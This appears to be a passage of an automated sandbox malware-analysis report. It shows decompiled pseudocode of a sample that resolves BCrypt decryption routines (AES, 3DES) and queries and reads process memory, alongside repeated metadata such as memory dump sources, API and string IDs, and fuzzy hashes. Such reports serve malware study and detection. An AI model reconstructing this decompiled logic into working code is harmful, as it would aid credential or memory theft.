                                                                                                                                                                                        				r14d = _t10;
                                                                                                                                                                                        				goto 0xcef221c7;
                                                                                                                                                                                        				_t12 = _t53 - 0x10; // 0x20
                                                                                                                                                                                        				r14d = _t12;
                                                                                                                                                                                        				_t37 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                        				if (_t37 == 0) goto 0xcef2222c;
                                                                                                                                                                                        				if (_t37 != 0) goto 0xcef2220e;
                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                        				_v136 =  &_a24;
                                                                                                                                                                                        				_t24 = NtQueryInformationProcess(??, ??, ??, ??, ??); // executed
                                                                                                                                                                                        				if (_t24 < 0) goto 0xcef2220e;
                                                                                                                                                                                        				if (_a24 != 0x30) goto 0xcef2220e;
                                                                                                                                                                                        				_t44 = _v80;
                                                                                                                                                                                        				if (_t44 == 0) goto 0xcef2220e;
                                                                                                                                                                                        				r8d = r14d;
                                                                                                                                                                                        				_v120 = _t44;
                                                                                                                                                                                        				_t25 = E00007FF77FF7CEF21170(__rbx,  &_v104,  &_v120,  &_v88); // executed
                                                                                                                                                                                        				return _t25;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CurrentProcess$InformationQuery
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4257070689-0
                                                                                                                                                                                        • Opcode ID: 3216325d5727be30611d2a21d91d4ee2bb1751acad3ba8bfa970bbb89ccb7318
                                                                                                                                                                                        • Instruction ID: 11dbc688807f651dc9261b4ff28083a38822101c567d33d814a02d44d6257dfa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3216325d5727be30611d2a21d91d4ee2bb1751acad3ba8bfa970bbb89ccb7318
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331B036B14B528AFBA4DF51E840AAD7364BB04BA8F900035DE0D23794DF39E856C350
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                        • String ID: BCryenAlthmPder$BCrynerammeteyBCryenAlthmPder$BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGetProperty$BCryptSetProperty$LoadLibraryW$c$der$gori$kernel32$rovi$t$thmP$y
                                                                                                                                                                                        • API String ID: 384173800-2409299874
                                                                                                                                                                                        • Opcode ID: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                                                                                                                                                                        • Instruction ID: 176c12ae69f235a0af55597715c9e9e5c139de873d40a1658fe8581579fbf8b5
                                                                                                                                                                                        • Opcode Fuzzy Hash: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                                                                                                                                                                        • Instruction Fuzzy Hash: FE51C471E49E038AFB90EF60E840178B7B4BB84778FA4013AD90D66668DF3CA544D724
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc$FileMemoryPointerProcess$FreeLocalReadWrite
                                                                                                                                                                                        • String ID: LocalAlloc$ReadFile$WriteFile$kernel32
                                                                                                                                                                                        • API String ID: 1117553398-482538141
                                                                                                                                                                                        • Opcode ID: d16a015a5a2ce17a36118ae818b65e4e6dee09ec94e4f7e7aeb2ba8e0262f2a2
                                                                                                                                                                                        • Instruction ID: 651c699b016f6e231725d78a37f7840dcbe72e8cb22358190b6d1bad5859d4ff
                                                                                                                                                                                        • Opcode Fuzzy Hash: d16a015a5a2ce17a36118ae818b65e4e6dee09ec94e4f7e7aeb2ba8e0262f2a2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D514F76A08A4282EB90EF16E85057DB361FB88FE4B849031DA4E97B94CF3CE845C314
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                                                        			E00007FF77FF7CEF2196C(void* __edx, long long __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                        				void* _t164;
                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                        				void* _t170;
                                                                                                                                                                                        				void* _t174;
                                                                                                                                                                                        				void* _t189;
                                                                                                                                                                                        				void* _t242;
                                                                                                                                                                                        				void* _t244;
                                                                                                                                                                                        				intOrPtr _t246;
                                                                                                                                                                                        				long long* _t250;
                                                                                                                                                                                        				void* _t258;
                                                                                                                                                                                        				WCHAR* _t285;
                                                                                                                                                                                        				long long* _t287;
                                                                                                                                                                                        				intOrPtr _t288;
                                                                                                                                                                                        				WCHAR* _t289;
                                                                                                                                                                                        				unsigned long long _t298;
                                                                                                                                                                                        				WCHAR* _t300;
                                                                                                                                                                                        				WCHAR* _t301;
                                                                                                                                                                                        				WCHAR* _t308;
                                                                                                                                                                                        				struct _EXCEPTION_RECORD _t310;
                                                                                                                                                                                        				long long _t312;
                                                                                                                                                                                        				long long _t313;
                                                                                                                                                                                        				signed long long _t366;
                                                                                                                                                                                        				struct _EXCEPTION_RECORD _t388;
                                                                                                                                                                                        				long long* _t391;
                                                                                                                                                                                        				signed int* _t392;
                                                                                                                                                                                        				intOrPtr _t394;
                                                                                                                                                                                        				void* _t396;
                                                                                                                                                                                        				void* _t399;
                                                                                                                                                                                        				WCHAR* _t401;
                                                                                                                                                                                        				void* _t402;
                                                                                                                                                                                        				void* _t404;
                                                                                                                                                                                        				void* _t405;
                                                                                                                                                                                        				struct HINSTANCE__* _t410;
                                                                                                                                                                                        				intOrPtr* _t412;
                                                                                                                                                                                        				WCHAR* _t414;
                                                                                                                                                                                        				signed int* _t415;
                                                                                                                                                                                        				void* _t419;
                                                                                                                                                                                        				void* _t422;
                                                                                                                                                                                        				long long* _t424;
                                                                                                                                                                                        
                                                                                                                                                                                        				 *((long long*)(_t404 + 0x18)) = __r8;
                                                                                                                                                                                        				 *((long long*)(_t404 + 0x10)) = __rdx;
                                                                                                                                                                                        				_t402 = _t404 - 0xc8;
                                                                                                                                                                                        				_t405 = _t404 - 0x1c8;
                                                                                                                                                                                        				r13d = 0;
                                                                                                                                                                                        				 *((long long*)(_t405 + 0x58)) = __rcx;
                                                                                                                                                                                        				 *((long long*)(_t405 + 0x38)) = __rcx;
                                                                                                                                                                                        				 *(_t405 + 0x60) = _t414;
                                                                                                                                                                                        				 *((long long*)(_t405 + 0x68)) = 0xcef30618;
                                                                                                                                                                                        				 *(_t405 + 0x50) = _t414;
                                                                                                                                                                                        				 *(_t402 + 0x110) = _t414;
                                                                                                                                                                                        				_t10 =  &(_t414[0]); // 0x1
                                                                                                                                                                                        				_t246 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                        				if (_t246 == 0) goto 0xcef21e78;
                                                                                                                                                                                        				if (_t246 == 0) goto 0xcef21bd8;
                                                                                                                                                                                        				if (_t246 == 0) goto 0xcef21b3a;
                                                                                                                                                                                        				if (_t246 == 0) goto 0xcef219f5;
                                                                                                                                                                                        				goto 0xcef21f6e;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21864(0xb, _t310, _t402 + 0x110, _t388, _t399, _t402, _t422, _t419) < 0) goto 0xcef21f6e;
                                                                                                                                                                                        				_t412 =  *(_t402 + 0x110);
                                                                                                                                                                                        				r14d = r13d;
                                                                                                                                                                                        				 *(_t405 + 0x48) = _t405 + 0x20;
                                                                                                                                                                                        				if ( *_t412 - r13d <= 0) goto 0xcef21f6e;
                                                                                                                                                                                        				_t415 = _t412 + 0x20;
                                                                                                                                                                                        				 *(_t402 + 0x110) = 0xffffffe0;
                                                                                                                                                                                        				if (_t10 == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				_t285 =  *((intOrPtr*)(_t415 - 8));
                                                                                                                                                                                        				 *(_t405 + 0x30) = _t285;
                                                                                                                                                                                        				 *(_t405 + 0x40) =  *_t415;
                                                                                                                                                                                        				_t287 =  &(_t285[0xfffffffffffffff0]) + _t415;
                                                                                                                                                                                        				_t424 = _t287 + _t412 + 0x30;
                                                                                                                                                                                        				_t250 = _t424;
                                                                                                                                                                                        				if (_t250 == 0) goto 0xcef21b21;
                                                                                                                                                                                        				asm("repne scasb");
                                                                                                                                                                                        				_t320 =  !(0xffffffe0 - _t412 | 0xffffffff) - 1;
                                                                                                                                                                                        				 *((long long*)(_t402 + 0x128)) = 0xffffffe0;
                                                                                                                                                                                        				if (_t250 == 0) goto 0xcef21ae5;
                                                                                                                                                                                        				_t25 = _t320 + 2; // 0xffffffe1
                                                                                                                                                                                        				GetModuleHandleW(_t414);
                                                                                                                                                                                        				GetProcAddress(_t410);
                                                                                                                                                                                        				_t366 =  !(0xffffffe0 - _t412 | 0xffffffff) - 1 + _t25;
                                                                                                                                                                                        				 *_t287();
                                                                                                                                                                                        				_t391 = _t287;
                                                                                                                                                                                        				if (_t287 == 0) goto 0xcef21ae5;
                                                                                                                                                                                        				_t288 =  *((intOrPtr*)(_t402 + 0x128));
                                                                                                                                                                                        				if (_t288 == 0) goto 0xcef21ae5;
                                                                                                                                                                                        				 *((short*)(_t391 + _t366 * 2)) =  *((char*)(_t366 + _t424));
                                                                                                                                                                                        				if (_t366 + 1 - _t288 < 0) goto 0xcef21ad4;
                                                                                                                                                                                        				if (_t391 == 0) goto 0xcef21b1a;
                                                                                                                                                                                        				RtlInitUnicodeString(_t388);
                                                                                                                                                                                        				 *(_t405 + 0x44) =  *(_t405 + 0x44) & 0x00000000;
                                                                                                                                                                                        				_t156 =  *((intOrPtr*)(_t402 + 0x118))();
                                                                                                                                                                                        				LocalFree(_t399);
                                                                                                                                                                                        				r14d = r14d + 1;
                                                                                                                                                                                        				if (r14d -  *_t412 < 0) goto 0xcef21a44;
                                                                                                                                                                                        				goto 0xcef21f6e;
                                                                                                                                                                                        				_t289 = _t405 + 0x20;
                                                                                                                                                                                        				 *(_t405 + 0x48) = _t289;
                                                                                                                                                                                        				E00007FF77FF7CEF21624(4,  *((intOrPtr*)( *((intOrPtr*)(_t412 + 8)))), __r8);
                                                                                                                                                                                        				if (_t289 == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				if ( *_t289 <= 0) goto 0xcef21bd1;
                                                                                                                                                                                        				_t40 =  &(_t289[6]); // 0xc
                                                                                                                                                                                        				_t392 = _t40;
                                                                                                                                                                                        				_t258 = _t156;
                                                                                                                                                                                        				if (_t258 == 0) goto 0xcef21bd1;
                                                                                                                                                                                        				 *(_t405 + 0x30) =  *((intOrPtr*)(_t392 - 8));
                                                                                                                                                                                        				 *(_t405 + 0x40) =  *_t392;
                                                                                                                                                                                        				r8d = _t392[3];
                                                                                                                                                                                        				_t408 = __r8 +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t412 + 8)))) + 8));
                                                                                                                                                                                        				if (_t258 == 0) goto 0xcef21bc5;
                                                                                                                                                                                        				E00007FF77FF7CEF24104(0x5c, __r8 +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t412 + 8)))) + 8)) + 4, __r8 +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t412 + 8)))) + 8)));
                                                                                                                                                                                        				RtlInitUnicodeString(_t310);
                                                                                                                                                                                        				E00007FF77FF7CEF21F84(0x5c, _t310, _t405 + 0x30, _t392, _t399);
                                                                                                                                                                                        				_t162 =  *_t424();
                                                                                                                                                                                        				if (1 -  *_t289 < 0) goto 0xcef21b6c;
                                                                                                                                                                                        				goto 0xcef21f6e;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				 *(_t405 + 0x48) = _t405 + 0x20;
                                                                                                                                                                                        				_t163 = E00007FF77FF7CEF2214C(_t310, _t412, _t402 - 0x80, _t399); // executed
                                                                                                                                                                                        				if (_t163 == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				 *(_t405 + 0x60) = _t402 + 0x80;
                                                                                                                                                                                        				r8d = 0x40;
                                                                                                                                                                                        				 *(_t405 + 0x50) =  *((intOrPtr*)(_t402 - 0x68));
                                                                                                                                                                                        				_t164 = E00007FF77FF7CEF21170(_t310, _t405 + 0x60, _t405 + 0x50, _t408); // executed
                                                                                                                                                                                        				if (_t164 == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				_t312 =  *((intOrPtr*)(_t402 - 0x68)) + 0x10;
                                                                                                                                                                                        				goto 0xcef21d1e;
                                                                                                                                                                                        				if (_t162 == 0) goto 0xcef21d27;
                                                                                                                                                                                        				 *(_t405 + 0x50) =  *((intOrPtr*)(_t402 + 0xa0)) + 0xfffffff0;
                                                                                                                                                                                        				r8d = 0x68;
                                                                                                                                                                                        				 *(_t405 + 0x60) = _t402 - 0x20;
                                                                                                                                                                                        				_t165 = E00007FF77FF7CEF21170(_t312, _t405 + 0x60, _t405 + 0x50, _t408); // executed
                                                                                                                                                                                        				if (_t165 == 0) goto 0xcef21d16;
                                                                                                                                                                                        				asm("movups xmm0, [ebp+0x38]");
                                                                                                                                                                                        				 *(_t405 + 0x30) =  *((intOrPtr*)(_t402 + 0x10));
                                                                                                                                                                                        				asm("movdqu [esp+0x20], xmm0");
                                                                                                                                                                                        				 *(_t405 + 0x40) =  *(_t402 + 0x20);
                                                                                                                                                                                        				_t298 =  *(_t402 + 0x38) >> 0x10;
                                                                                                                                                                                        				GetModuleHandleW(_t401);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *_t298();
                                                                                                                                                                                        				 *(_t405 + 0x28) = _t298;
                                                                                                                                                                                        				if (_t298 == 0) goto 0xcef21d16;
                                                                                                                                                                                        				r8d =  *(_t405 + 0x22) & 0x0000ffff;
                                                                                                                                                                                        				 *(_t405 + 0x60) = _t298;
                                                                                                                                                                                        				 *(_t405 + 0x50) =  *((intOrPtr*)(_t402 + 0x40));
                                                                                                                                                                                        				_t170 = E00007FF77FF7CEF21170(_t312, _t405 + 0x60, _t405 + 0x50, _t408); // executed
                                                                                                                                                                                        				if (_t170 == 0) goto 0xcef21d0b;
                                                                                                                                                                                        				E00007FF77FF7CEF21F84( *(_t402 + 0x20) & 0x0000ffff, _t312, _t405 + 0x30,  &(_t392[0x1b]), _t399); // executed
                                                                                                                                                                                        				_t242 =  *_t424();
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t402 - 0x10)) + 0xfffffff0 != _t312) goto 0xcef21c43;
                                                                                                                                                                                        				if (_t242 == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				r8d = 1;
                                                                                                                                                                                        				_t174 = E00007FF77FF7CEF2214C(_t312, _t412, _t405 + 0x70, _t399); // executed
                                                                                                                                                                                        				if (_t174 == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				_t300 = _t402 + 0x50;
                                                                                                                                                                                        				 *(_t405 + 0x60) = _t300;
                                                                                                                                                                                        				r8d = 0x24;
                                                                                                                                                                                        				 *(_t405 + 0x50) = _t300;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t312, _t405 + 0x60, _t405 + 0x50, _t408) == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				_t301 = _t300 - 8;
                                                                                                                                                                                        				_t313 = _t312 + 0xc;
                                                                                                                                                                                        				goto 0xcef21e6a;
                                                                                                                                                                                        				if (_t242 == 0) goto 0xcef21f6b;
                                                                                                                                                                                        				r8d = 0x34;
                                                                                                                                                                                        				 *(_t405 + 0x60) = _t402 - 0x60;
                                                                                                                                                                                        				 *(_t405 + 0x50) = _t301;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t313, _t405 + 0x60, _t405 + 0x50, _t408) == 0) goto 0xcef21e63;
                                                                                                                                                                                        				 *(_t405 + 0x30) = _t301;
                                                                                                                                                                                        				 *(_t405 + 0x40) =  *(_t402 - 0x40);
                                                                                                                                                                                        				 *((short*)(_t405 + 0x20)) =  *(_t402 - 0x34) & 0x0000ffff;
                                                                                                                                                                                        				_t182 =  *(_t402 - 0x32) & 0x0000ffff;
                                                                                                                                                                                        				 *(_t405 + 0x22) =  *(_t402 - 0x32) & 0x0000ffff;
                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                        				GetProcAddress(??, ??);
                                                                                                                                                                                        				 *_t301();
                                                                                                                                                                                        				 *(_t405 + 0x28) = _t301;
                                                                                                                                                                                        				if (_t301 == 0) goto 0xcef21e63;
                                                                                                                                                                                        				r8d =  *(_t405 + 0x22) & 0x0000ffff;
                                                                                                                                                                                        				 *(_t405 + 0x60) = _t301;
                                                                                                                                                                                        				 *(_t405 + 0x50) = _t301;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21170(_t313, _t405 + 0x60, _t405 + 0x50, _t408) == 0) goto 0xcef21e58;
                                                                                                                                                                                        				E00007FF77FF7CEF21F84( *(_t402 - 0x32) & 0x0000ffff, _t313, _t405 + 0x30,  &(_t392[0x1b]), _t399);
                                                                                                                                                                                        				_t189 =  *_t424();
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if (_t301 - 8 != _t313) goto 0xcef21d95;
                                                                                                                                                                                        				goto 0xcef21f6b;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				if (E00007FF77FF7CEF2214C(_t313, _t412, _t402 - 0x80, _t399) == 0) goto 0xcef21ee1;
                                                                                                                                                                                        				_t394 =  *((intOrPtr*)( *((intOrPtr*)(_t402 - 0x68)) + 0x20));
                                                                                                                                                                                        				goto 0xcef21ed1;
                                                                                                                                                                                        				if (_t189 == 0) goto 0xcef21ede;
                                                                                                                                                                                        				 *(_t405 + 0x30) =  *((intOrPtr*)(_t394 + 0x30));
                                                                                                                                                                                        				 *(_t405 + 0x40) =  *(_t394 + 0x40);
                                                                                                                                                                                        				 *(_t405 + 0x48) = _t394 + 0x58;
                                                                                                                                                                                        				E00007FF77FF7CEF21F84(_t182, _t313, _t405 + 0x30, _t394, _t399);
                                                                                                                                                                                        				_t244 =  *_t424();
                                                                                                                                                                                        				_t396 =  *((intOrPtr*)(_t394 + 0x10)) - 0x10;
                                                                                                                                                                                        				if (_t396 !=  *((intOrPtr*)(_t402 - 0x68)) + 0x10) goto 0xcef21e95;
                                                                                                                                                                                        				_t308 = _t405 + 0x20;
                                                                                                                                                                                        				 *(_t405 + 0x48) = _t308;
                                                                                                                                                                                        				if (_t244 == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				if (r13d < 0) goto 0xcef21f6e;
                                                                                                                                                                                        				r8d = 1;
                                                                                                                                                                                        				if (E00007FF77FF7CEF2214C(_t313, _t412, _t405 + 0x70, _t399) == 0) goto 0xcef21f6e;
                                                                                                                                                                                        				goto 0xcef21f5e;
                                                                                                                                                                                        				if (_t244 == 0) goto 0xcef21f6b;
                                                                                                                                                                                        				 *(_t405 + 0x30) = _t308;
                                                                                                                                                                                        				 *(_t405 + 0x40) =  *(_t396 + 0x20);
                                                                                                                                                                                        				 *((short*)(_t405 + 0x20)) =  *(_t396 + 0x2c) & 0x0000ffff;
                                                                                                                                                                                        				 *(_t405 + 0x22) =  *(_t396 + 0x2e) & 0x0000ffff;
                                                                                                                                                                                        				 *(_t405 + 0x28) = _t308;
                                                                                                                                                                                        				E00007FF77FF7CEF21F84(_t182, _t313, _t405 + 0x30, _t396, _t399);
                                                                                                                                                                                        				 *_t424();
                                                                                                                                                                                        				if (_t396 - 8 !=  &(_t308[8])) goto 0xcef21f13;
                                                                                                                                                                                        				return r13d;
                                                                                                                                                                                        			}

















































                                                                                                                                                                                        0x7ff7cef21f2f
                                                                                                                                                                                        0x7ff7cef21f38
                                                                                                                                                                                        0x7ff7cef21f40
                                                                                                                                                                                        0x7ff7cef21f45
                                                                                                                                                                                        0x7ff7cef21f52
                                                                                                                                                                                        0x7ff7cef21f69
                                                                                                                                                                                        0x7ff7cef21f83

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 979628613-3502785670
                                                                                                                                                                                        • Opcode ID: 2e85f13aae667f3260406cb317723514b5c67926e5243f8a55408fdb5d2d8e11
                                                                                                                                                                                        • Instruction ID: a40a02fa14b7011ef87375882f5a70e7a44e18b8d9076926859e99a380a1f394
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e85f13aae667f3260406cb317723514b5c67926e5243f8a55408fdb5d2d8e11
                                                                                                                                                                                        • Instruction Fuzzy Hash: 90025137A09B8686EBA0DF15E4406AEB3A4FB88764F900131EE5D57B99EF3CE504C714
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                        • String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
                                                                                                                                                                                        • API String ID: 1646373207-1761306045
                                                                                                                                                                                        • Opcode ID: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                                                                                                                                                                        • Instruction ID: bcde4fc9fa0bab66f8898f5627a7638c7841b4b32ba665d52c7bc8090dda3dd8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                                                                                                                                                                        • Instruction Fuzzy Hash: AE41E131A09E4382FB90AF15F854AA5A361BF847B9FD11032CA0DA7664EF3DE549C724
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                        			E00007FF77FF7CEF236D8(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9) {
                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                        				intOrPtr _t100;
                                                                                                                                                                                        				long long _t171;
                                                                                                                                                                                        				long long _t172;
                                                                                                                                                                                        				signed long long _t173;
                                                                                                                                                                                        				signed long long _t176;
                                                                                                                                                                                        				long long _t177;
                                                                                                                                                                                        				long long _t178;
                                                                                                                                                                                        				long long _t179;
                                                                                                                                                                                        				signed long long _t185;
                                                                                                                                                                                        				intOrPtr* _t204;
                                                                                                                                                                                        				signed long long _t219;
                                                                                                                                                                                        				intOrPtr _t231;
                                                                                                                                                                                        				intOrPtr _t232;
                                                                                                                                                                                        				intOrPtr _t233;
                                                                                                                                                                                        				void* _t238;
                                                                                                                                                                                        				void* _t240;
                                                                                                                                                                                        				void* _t242;
                                                                                                                                                                                        				void* _t243;
                                                                                                                                                                                        				void* _t245;
                                                                                                                                                                                        				void* _t246;
                                                                                                                                                                                        				long long _t248;
                                                                                                                                                                                        				long long _t250;
                                                                                                                                                                                        				struct HINSTANCE__* _t252;
                                                                                                                                                                                        				WCHAR* _t255;
                                                                                                                                                                                        				void* _t256;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t248 = __r8;
                                                                                                                                                                                        				 *((long long*)(_t245 + 8)) = __rbx;
                                                                                                                                                                                        				_t243 = _t245 - 0x37;
                                                                                                                                                                                        				_t246 = _t245 - 0xf0;
                                                                                                                                                                                        				 *(_t243 - 0x79) =  *(_t243 - 0x79) & 0x00000000;
                                                                                                                                                                                        				_t5 = _t243 + 0x77; // 0x7ff7cef22568
                                                                                                                                                                                        				_t256 = __rcx;
                                                                                                                                                                                        				 *(_t246 + 0x20) = _t5;
                                                                                                                                                                                        				 *((intOrPtr*)(_t243 + 0x77)) = 1;
                                                                                                                                                                                        				 *((long long*)(_t246 + 0x28)) = 0xcef30618;
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x71)) = 0xcef30618;
                                                                                                                                                                                        				_t99 = E00007FF77FF7CEF2326C(_t98, 1, __r9); // executed
                                                                                                                                                                                        				r12d = _t99;
                                                                                                                                                                                        				 *((intOrPtr*)(_t243 + 0x7f)) = _t99;
                                                                                                                                                                                        				if (_t99 < 0) goto 0xcef23a63;
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x49)) = 0xcef30688;
                                                                                                                                                                                        				_t171 =  *0xcef30920; // 0x7ff7cef2c018
                                                                                                                                                                                        				 *((long long*)(_t243 - 0x41)) = _t171;
                                                                                                                                                                                        				_t100 =  *0xcef30698; // 0x2ee
                                                                                                                                                                                        				if (_t100 - 0xbb8 >= 0) goto 0xcef2375c;
                                                                                                                                                                                        				goto 0xcef237a3;
